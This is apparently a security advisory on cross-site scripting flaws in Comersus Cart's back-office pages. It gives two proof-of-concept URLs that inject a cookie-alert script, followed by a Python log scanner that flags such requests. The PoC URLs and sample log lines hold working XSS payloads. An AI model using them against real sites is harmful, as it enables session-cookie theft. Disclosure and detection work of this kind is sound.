Comersus Open Technologies Comersus Cart Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof-of-concept URIs are available:
http://www.example.com/backofficetest/backOfficePlus/comersus_backoffice_listAssignedPricesToCustomer.asp?idCustomer=7&name=><script>alert(document.cookie);</script>
http://www.example.com/backofficetest/backOfficePlus/comersus_backoffice_message.asp?message=><script>alert(document.cookie);</script>
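
For detection, the following added example (not part of the original advisory or of Comersus code) scans web access logs for requests to the two scripts above whose `name` or `message` parameter decodes to HTML markup characters. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Script name -> parameter taken from the two proof-of-concept URIs above.
WATCHED = {
    "comersus_backoffice_listassignedpricestocustomer.asp": "name",
    "comersus_backoffice_message.asp": "message",
}
MARKUP = re.compile(r"[<>\"']")  # characters that can break out of HTML markup
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so that %253C is seen as '<'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_suspicious_requests(log_lines):
    """Return (script, parameter, decoded value) for each flagged request."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue  # not one of the scripts named in the advisory
        for key, raw in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(raw)
            if key.lower() == param and MARKUP.search(value):
                hits.append((script, param, value))
    return hits

# Constructed access-log lines (combined log format assumed), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] "GET /backofficetest/backOfficePlus/comersus_backoffice_message.asp?message=%3E%3Cscript%3Ealert(document.cookie)%3B%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2010:10:00:05 +0000] "GET /backofficetest/backOfficePlus/comersus_backoffice_listAssignedPricesToCustomer.asp?idCustomer=7&name=%253Cb%253E HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2010:10:01:00 +0000] "GET /backofficetest/backOfficePlus/comersus_backoffice_message.asp?message=Order+saved HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A legitimate value containing a quote character will also be flagged, so treat hits as leads to review rather than confirmed attempts.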


 

Copyright 2010, SecurityFocus